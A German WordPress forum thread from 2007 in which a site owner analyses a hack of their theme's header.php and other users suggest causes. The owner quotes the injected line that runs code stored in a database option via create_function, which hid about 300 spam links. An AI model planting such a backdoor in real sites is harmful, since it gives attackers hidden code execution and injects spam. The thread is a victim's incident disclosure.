1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Wordpress gehackt und header manipuliert

Dieses Thema im Forum "Allgemeines" wurde erstellt von lofthome.ch, 25. November 2007.

  1. lofthome.ch

    lofthome.ch Active Member

    Registriert seit:
    22. März 2007
    Beiträge:
    27
    Zustimmungen:
    0
    Wir haben festgestellt, dass auf unserer Seite Immobilien Zug Zürich Aargau Schweiz. Loft Luxusimmobilien Villen Häuser in den letzten Wochen vermehrt Benutzer mit Suchbegriffen unter der Gürtellinie gelandet sind. Eine erste Analyse hat zunächst kein Ergebnis gebracht, nach vermehrt einschlägigen Besuchern haben wir diese intensiviert. Die Suchbegriffe sind derzeit noch auf google sichtbar, auf unserer Webseite jedoch nicht.
    Zusammenfassung der Ergebnisse:

    --------------------------------------------------------------------------------------------------------------
    1. Am 07.09.2007 wurde unsere header.php von IP Nummer 88.191.17.141 mittels POST request überschrieben

    Auszug aus dem Access Log
    88.191.17.141 [07/Sep/2007:10:51:36 +0200] POST /wp-admin/ theme-editor.php HTTP/1.1 302 - http://www.lofthome???/wp-admin/theme-editor.php?file=wp-content/themes/themename/header.php&theme=lofthome+immobilien Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
    88.191.17.141 [07/Sep/2007:10:52:08 +0200] POST /wp-admin/ theme-editor.php HTTP/1.1 302 - http://www.lofthome???/wp-admin/theme-editor.php?file=wp-content/themes/themename/header.php&theme=lofthome+immobilien&a=te Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
    --------------------------------------------------------------------------------------------------------------
    2. Ein Login für diese IP bzw. diesen Benutzer können wir aufgrund der Logfiles nicht erkennen.
    --------------------------------------------------------------------------------------------------------------
    3. Die Änderung hat in header.php eine Function wp-headers angelegt.

    php /* Don't remove this line. */ wp_head(); $wp_headers = create_function('', get_option("blog_headers"));

    Weiter untem in der Datei dann der kritische Aufruf

    div id="container"

    div id="header"
    php $wp_headers()

    --------------------------------------------------------------------------------------------------------------
    4. Die Funktion liest die Daten aus wp_option für den Key blog_headers.
    --------------------------------------------------------------------------------------------------------------
    5. Das Feld der Tabelle enthielt zuerst eine unverfänglich aussehende Zeile

    DOCTYPE html PUBLIC //W3C//DTD XHTML 1.0 Transitional//EN ...

    dann ca. 20 Leerzeilen, sodass der weitere Inhalt auf Anhieb gar nicht erkennbar war und dann Hexadezimal rund 300 versteckte Links
    mit einem encode Befehl am Ende.
    --------------------------------------------------------------------------------------------------------------
    6. Das Ergebnis war verheerend. Inzwischen alle Accounts geändert, WP User admin gelöscht, FTP account geändert.


    Trotzdem bleibt die Frage:

    WIE KANN DIE HEADER.PHP IN UNSEREM THEME GEÄNDERT WORDEN SEIN, OHNE DASS ZUVOR EIN LOGIN AUF UNSERE SEITE STATTGEFUNDEN HAT?
     
  2. jottlieb

    jottlieb Well-Known Member
    Ehrenmitglied

    Registriert seit:
    20. August 2005
    Beiträge:
    17.381
    Zustimmungen:
    1
    Zum Beispiel durch eine Sicherheitslücke in einer veraltenen WordPress-Version.
     
  3. Syntronica

    Syntronica Well-Known Member

    Registriert seit:
    11. März 2006
    Beiträge:
    1.051
    Zustimmungen:
    0
    Habt Ihr WP 2.3 nach der "Änderung" schon gehabt?

    Auf jeden Fall würde ich 2.3.1 auch aufspielen.
     
  4. lofthome.ch

    lofthome.ch Active Member

    Registriert seit:
    22. März 2007
    Beiträge:
    27
    Zustimmungen:
    0
    Nein, zu diesem Zeitpunkt war wohl noch eine 2.1 Version im Einsatz.

    Was wir uns auch nicht erklären können. Die fraglichen Links veränderten sich offenbar von Zeit zu Zeit. D.h. der Inhalt aus wp_options konnte wärend des Vorhandenseins dieser Manipulation geändert werden.
     
  5. Syntronica

    Syntronica Well-Known Member

    Registriert seit:
    11. März 2006
    Beiträge:
    1.051
    Zustimmungen:
    0
    WP 2.1 war ja stellenweise offen wie ein Scheunentor. Möglicherweise hat irgendwo ein Script gelegen, dass von innen heraus Mist gebaut hat.
     
  6. D²Weblog

    D²Weblog Well-Known Member

    Registriert seit:
    7. November 2007
    Beiträge:
    83
    Zustimmungen:
    0
    .htaccess im wp-admin nutzen und fertig! Oder?
     
  7. c-bass

    c-bass Member

    Registriert seit:
    21. Mai 2007
    Beiträge:
    18
    Zustimmungen:
    0
    wie genau kann ich die htaccess nutzen? Was muss ich darein schreiben? :confused:
     
  8. marX

    marX Well-Known Member
    Ehrenmitglied

    Registriert seit:
    5. Oktober 2006
    Beiträge:
    12.943
    Zustimmungen:
    0
  9. jottlieb

    jottlieb Well-Known Member
    Ehrenmitglied

    Registriert seit:
    20. August 2005
    Beiträge:
    17.381
    Zustimmungen:
    1
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden